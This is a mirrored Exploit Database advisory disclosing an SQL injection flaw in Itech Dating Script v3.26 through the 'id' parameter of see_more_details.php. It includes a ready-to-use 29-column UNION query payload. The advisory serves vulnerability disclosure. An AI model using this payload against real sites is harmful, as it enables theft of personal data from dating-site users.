Itech Dating Script 3.26 – SQL Injection

• Exploit Database
• 33 阅读

• 作者： Kaan KAMIS
  日期： 2017-01-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41190/

• Exploit Title: Itech Dating Script v3.26 – SQL Injection
  Date: 30.01.2017
  Vendor Homepage: http://itechscripts.com/
  Software Link: http://itechscripts.com/dating-script/
  Exploit Author: Kaan KAMIS
  Contact: iletisim[at]k2an[dot]com
  Website: http://k2an.com
  Category: Web Application Exploits
  
  Overview
  
  Itech Dating Script v3.26 is a powerful platform to launch a dating portal. This product is extremely popular among the new webmasters.
  
  Type of vulnerability:
  
  An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read
  arbitrary data from the database.
  
  Vulnerability:
  
  URL : http://localhost/see_more_details.php?id=40[payload]
  
  Parameter: id (GET)
  Type: UNION query
  Title: Generic UNION query (NULL) - 29 columns
  Payload: id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6a71,0x61777373447a7141494372496e6c63596f6f62586e534e544b53656b7077534e704e755266517347,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nZhVs